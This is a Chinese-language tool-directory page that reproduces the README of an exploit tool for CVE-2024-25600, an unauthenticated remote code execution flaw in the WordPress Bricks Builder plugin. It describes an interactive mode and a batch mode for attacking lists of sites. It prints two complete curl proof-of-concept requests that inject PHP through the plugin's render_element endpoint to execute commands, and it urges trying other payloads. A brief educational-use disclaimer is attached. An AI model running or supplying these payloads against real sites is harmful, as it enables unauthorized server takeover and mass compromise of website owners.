Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

CVE-2024-25600 的自动化漏洞利用工具,可在使用 Bricks Builder 插件的 WordPress 站点上实现未认证的远程代码执行。支持交互式和批量模式执行命令。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
2年前尚未审核

CVE-2024-25600 漏洞利用工具 🚀

描述 📝

该工具 🛠️ 用于利用 WordPress 的 Bricks Builder 插件中存在的 CVE-2024-25600 漏洞 🕳️。该漏洞允许在受影响的网站 💻 上进行未认证的远程代码执行。该工具通过检索 nonce 并发送精心构造的请求来执行任意命令,从而自动化利用过程。

功能特点 🌟

  • 交互模式:实时与目标网站交互 🕹️。
  • 批量模式:从列表中扫描并利用多个网站 📋。
  • 命令执行:在目标服务器上执行任意命令 ⚙️。

安装 🛠️

  1. 使用 git clone 将此仓库克隆到您的本地机器 🖥️。
  2. 进入克隆仓库的目录。
  3. 使用 pip install -r requirements.txt 安装所需的 Python 库。

使用方法 📖

交互模式 🎮

  1. 使用 python exploit.py -u <URL> 运行该工具以启动交互模式。
  2. 按照屏幕提示向目标服务器发送命令。

批量模式 📊

  1. 准备一个包含目标 URL 列表的文本文件。
  2. 使用 python exploit.py -l <file_path> 运行该工具以扫描并利用列出的网站。

概念验证(PoC) 📝

披露中提供的基础 PoC 如下:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

更新:第二个 PoC(更可靠)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

可能还有其他载荷能产生更好的效果。如果我的漏洞利用工具或概念验证对您无效,建议您尝试其他载荷以找到更有效的解决方案。

将 [HOST] 替换为目标网站,将 [NONCE] 替换为从网站获取的 nonce 值。

参考 📖

有关 CVE-2024-25600 漏洞的更多信息,请参阅 Snicco.io 上的详细披露。

免责声明 ⚠️

本 README 中提供的信息仅供教育目的使用。未经授权入侵网站或网络是非法且不道德的。🚫

致谢 🙏

感谢发现并报告此漏洞的安全研究人员,他们为社区提供了信息和工具,帮助保护其 Web 应用程序。

下载工具